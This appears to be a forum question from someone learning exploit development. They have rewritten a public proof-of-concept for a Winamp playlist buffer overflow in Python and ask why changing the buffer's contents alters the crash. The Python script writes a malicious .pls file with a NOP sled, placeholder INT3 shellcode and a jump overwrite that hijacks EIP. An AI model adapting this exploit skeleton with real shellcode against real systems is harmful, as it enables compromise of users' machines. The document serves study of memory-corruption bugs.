# Winmap crashing differently when changing the crashing buffer

Tags: exploit-development

I'm trying to replicated the "egg hunting" exploitation for the [Winmap](http://www.securiteam.com/exploits/5NP032AKUC.html) .

I started using the POC code provided (I rewrote it in Python) :

```
__author__ = 'HSN'
#!/usr/bin/python -w
start = "[playlist]\r\nFile1=\\\\"
#[playlist]\r\nFile1=\\\\"

nop = "\x90"*856
shellcode ="\xcc"*166
jmp = "\x41"*4+"\x83"*8+"\x90"*4


end="\r\nTitle1=pwnd\r\nLength1=512\r\nNumberOfEntries=1\r\nVersion=2\r\n"


evil = start + nop + shellcode + jmp + end
print len(evil)
f = open("boom.pls", "w")
f.write(evil)
```

When applying the previous code, the application crashes as expected (EIP is overwritten )

However, I wanted to replicated the fuzzing process (at least to get the EIP  offset myself) 
However, whenever i change the content of my buffer (While preserving the total length and taking bad characters into account) the application crashes in a way similar to what happens when SEH is overwritten.

Comment: Who still uses Winamp?

Comment: Who the hell cares who still uses it, he's not looking for a 0day, he is probably just learning.